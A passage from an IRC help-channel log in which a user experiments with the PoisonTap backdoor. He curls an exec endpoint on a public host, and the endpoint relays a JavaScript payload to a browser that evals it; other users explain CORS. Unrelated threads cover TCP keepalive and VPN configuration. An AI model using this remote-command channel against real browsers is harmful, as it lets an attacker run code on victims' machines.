'http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337/exec?alert("hiya")'" in this box, and the server console put out "on Apr 09 2018 17:48:09 GMT+0000 (UTC) HTTP server. URL /exec?alert(%22hiya%22)' requested." I didn't even execute that though, i just pasted the previous message I executed and chnaged the text in this text box to "hiya" 19:50 < shtrb|laptop> curl popup a message ?! 19:51 < grawity> it's certainly not a direct popup 19:51 < jamesc> wait what? 19:51 < jamesc> it is 19:51 < grawity> it's not 19:51 < jamesc> ok 19:51 < grawity> curl sends a standard "GET /exec?alert("hiya")" to http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337 19:51 < grawity> the server there takes the querystring and relays it to another connection (the websocket) 19:52 < grawity> over the websocket, it is received by JS on your browser 19:52 < jamesc> whatever it is that is a dialog box in my browser is what i get 19:52 < grawity> and that JS eval's the received data 19:52 < jamesc> ok 19:52 < jamesc> so there is an embedded page 19:52 < jamesc> that is receiving the command 19:52 < jamesc> or doing stuff with it 19:54 < grawity> so the embedded page ends up calling $.get(...), which is a jQuery function 19:55 < grawity> in jQuery, functions like get() add some extra custom headers, and that causes CORS to apply to those requests 19:55 < grawity> [disclaimer: I just found that on google] 19:55 < jamesc> jesus this embedded script is so hard to read 19:56 < jamesc> its four lines, each line is like 100000 yards long 19:56 < jamesc> function(d) is in there though 19:57 < jamesc> ok 20:01 < jamesc> here's part of it https://pastebin.com/gDkULJ5U 20:01 < jamesc> that relates to CORS 20:06 < jamesc> grawity , in this, "Failed to load http://192.168.0.1.ip.samy.pl/login: Redirect from 'http://192.168.0.1.ip.samy.pl/login' to 'http://buckeye-lab.smartrg.com/prime-home/control-panel/login?device=1CABC0:1CABC09732D0' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://192.168.15.1.ip.samy.pl' is therefore not allowed access." does that mean the header is 20:06 < jamesc> not present on the page requested or the page from where the request was made? 20:06 < shtrb|laptop> in the from part 20:08 < jamesc> so i just need to add that header to the request 20:08 < shtrb|laptop> You need Origin + Access-Control-Request-Method and Access-Control-Request-Header 20:10 < grawity> jamesc: the page requested 20:10 < grawity> the page that makes the request can't do anything about it 20:10 < grawity> since that'd be an easy way for malicious sites to bypass CORS 20:11 < grawity> shtrb|laptop: you don't need to add these headers manually -- the browser's XHR functions do that automatically anyway 20:12 < shtrb|laptop> grawity, I meant to add for curl if he wish to mimic the request 20:12 < shtrb|laptop> and -L 20:15 < jamesc> here are the headers from the page with the websocket connection when I issue the command https://pastebin.com/HDVdPBKX 20:15 < IamTrying> https://paste.ubuntu.com/p/FTM2k9Nrzc/ - Guru grawity, line 30 what value to insert? where line 5, line 7, line 11 confusing to shot myself. 20:16 < jamesc> and this is from another tab where I try to navigate to the same url https://pastebin.com/FasyFGnC 20:16 < grawity> jamesc: your another tab is completely irrelevant 20:16 < jamesc> i know im just trying to understand what is different 20:17 < jamesc> which is probably a bad heuristic 20:17 < grawity> you're looking at the wrong place 20:17 < grawity> the requests don't have to be different 20:17 < jamesc> but I am not able to visualize the whole thing 20:17 < jamesc> what i do see is that the headers are different 20:17 < grawity> what *causes* the requests is different 20:17 < jamesc> ok 20:18 < jamesc> yeah i think what causes the request from the embedded page is obviously jQuery, but I can't parse it all https://raw.githubusercontent.com/samyk/poisontap/master/backdoor.html 20:18 < grawity> you don't need to parse all of it 20:18 < jamesc> lol its huge 20:18 < grawity> "it's caused by jQuery" 20:18 < grawity> that's all 20:20 < jamesc> so if it is a request made by jQuery then CORS is engaged 20:21 < jamesc> that's the lesson 20:21 < grawity> in a way, yes 20:21 < zenix_2k2> so i have a question, i have 2 python scripts, one is a server and one is a client... and i am the server and i am currently having an established connection to the client... but how do i know whether my client shut down her/his computer or not ? 20:22 < zenix_2k2> cause each connection = a process, and i wanna check that in order to terminate some spare processes 20:22 < zenix_2k2> if you wonder why 20:22 < grawity> zenix_2k2: often the shutdown process will kill apps and tear down the connections 20:22 < grawity> if you want to detect unplanned poweroffs etc., you need some sort of ping/keepalive 20:22 < zenix_2k2> HHHHmmmm... 20:23 < shtrb|laptop> zenix_2k2, get yourself a keep alive (TCP or manual ) 20:23 < grawity> TCP has a built-in keepalive feature (see setsockopt), but individual protocols can implement their own 20:23 < zenix_2k2> can that be done via python ? 20:23 < grawity> sure 20:23 < IamTrying> left=%defaultroute what does it mean? inet 10.1.0.11/16 or inet 10.2.44.145/16 ? 20:24 < grawity> zenix_2k2: https://stackoverflow.com/a/14855726/49849 20:24 < IamTrying> left=FQDN, leftnextop=FQDN - what is FQDN? is it default gateway or remote gateway? 20:24 < grawity> "FQDN" means the full domain name 20:24 < SporkWitch> https://lmgtfy.com/?q=FQDN 20:24 < grawity> but usually left= should be your own IP address 20:25 < grawity> left=217.136.1.1 should be fine, without leftid/leftsourceip 20:25 < grawity> also 20:25 < grawity> you said you're using strongswan, but your ike= and phase2alg= settings look like libreswan syntax 20:25 < grawity> don't mix the two 20:25 < jamesc> interesting, this is part of PoisonTap's readme "Any "X-Frame-Options" security on the domain is bypassed as PoisonTap is now the HTTP server and chooses which headers to send to the client" 20:26 < grawity> they're like openbsd and netbsd, same grandpa but grew up differently 20:26 < zenix_2k2> anyway,set_keepalive_linux(sock, after_idle_sec=1, interval_sec=3, max_fails=5)... should i keep it that way or should i change some of the arguments to make my connection more flexible ? 20:26 < grawity> jamesc: yes, but that only helps with the